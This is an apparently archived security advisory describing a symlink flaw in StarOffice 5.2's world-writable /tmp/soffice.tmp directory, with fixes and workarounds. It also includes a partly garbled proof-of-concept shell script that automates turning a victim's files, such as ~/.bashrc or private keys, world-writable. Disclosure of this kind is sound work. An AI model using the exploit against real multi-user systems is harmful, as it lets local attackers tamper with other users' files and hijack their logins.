StarOffice 5.2
Christian found following. A while back he noticed that
StarOffice 5.2 (running under Linux and Solaris) creates a
temporary directory under /tmp with the name "soffice.tmp" with
permissions 0777. Christian figured there had to be some security
issue here so he had a further look and noticed that there were
files created under here called svXXXX.tmp (where XXXX is a four
or sometimes five digit number) which seemed to contain
configuration information of some sort. Now while there might be
a whole bunch of possible issues with this in terms of race
conditions and symbolic links, there actually seems to be a much
easier way of attacking it.
When StarOffice creates the /tmp/soffice.tmp directory (with
explicitly set permissions 0777), it also seems to sometimes
chmod() this directory to 0777 afterwards. Therefore if user A
were to create a symbolic link to any file owned by user B, and
if user B were to run StarOffice the target of the link will
become 0777. As a result, if the directory containing this target
is accessible by user A, they can do whatever they want with the
target file. Some trivially exploitable scenarios here include:
- gaining access to sensitive files (e.g., encrypted files or
those containing private keys)
- making user B's mail spool file world read/write-able
- linking to a shell start-up file (e.g., ~/.profile,
~/.bashrc, ~/.cshrc etc.) which will become world
read/write-able and hence can be modified to execute
whatever user A wants next time user B logs in.
Note that there is no race condition here, the sym link just
needs to be made before StarOffice is run by the victim. There
is also no issue in guessing the temporary directory name -- it
is always "soffice.tmp". Also, from user B's point of view,
there is no indication that anything has gone wrong. From
testing (admittedly not extensive), StarOffice performs as usual
while being attacked giving no error message or such (i.e., for
those of us on SECPROG, it's quite reliable).
The only two restrictions found are that the target file must be
in a directory accessible by the attacker (otherwise it's 0777
perms are not that useful) and the target must NOT have executable
permission set. If it does then there seems to be no effect.
This was not tested extensively, nor looked at the source code
which is now available apparently, so we are not sure exactly why
this is. To be honest it's pretty baffling that someone would
create a directory with 0777 permissions, let alone the chmod()
it to 0777 (thus avoiding the effect of the umask). The only
reason we can think of is where more than one user is running
StarOffice on the same machine and since the "soffice.tmp"
directory name is constant, all users had to have access to it
(obviously generating a new directory name with a good
pseudorandom number attached to the end would be a better
The impact of this vulnerability is obviously fairly minimal on a
single-user workstation system but in an environment where there
is a central server with multiple users then anyone who uses
StarOffice is at significant risk.
Here is the xploit code (by JeT Li), to make sure that this will
work, run first staroffice, so you will become owner of
/tmp/soffice.tmp, necessary to remove it and create the symlink.
#!/bin/sh SOFFICE="/tmp/soffice.tmp"
if [ $# != 1 ]; then
echo " - = HeliSec - Helios Security and Administration = -"
echo "Usage : "
echo "./ <file>"
echo "Set 0777 permissions to any file (access to the directory of the file needed)"
echo " JeT Li -The Wushu Master-"
if [ ! -f ${TARGETFILE} ]; then
echo "Target file must exist"
rm -rf ${SOFFICE}
echo "Symbolik link done ..."
perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'
while :
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
echo "Permissions set succesfully ... good luck ;-)"
echo "- = HeliSec - Helios Security and Administration = -"
echo " JeT Li -The Wushu Master-"
The fix has been checked-in to StarOffice 5.2 SP1. Patches are
in the works for the current version (5.2) and other supported
lower versions (5.1a) against the current supported platforms for
each release.
A workaround is to set the environment variable TMP to a safe
alternative before running StarOffice. If you do this,
StarOffice will create the mode 0777 dir inside $TMP.
A real quick workaround is to make (as root) a "fixed"
/tmp/soffice.tmp 777 +t dir.
drwxrwxrwt 2 root root 1024 Nov 9 11:39 soffice.tmp
Note that files created by SO in this dir are still readable (but
not writable) by other users, so change the $TMP var is probabily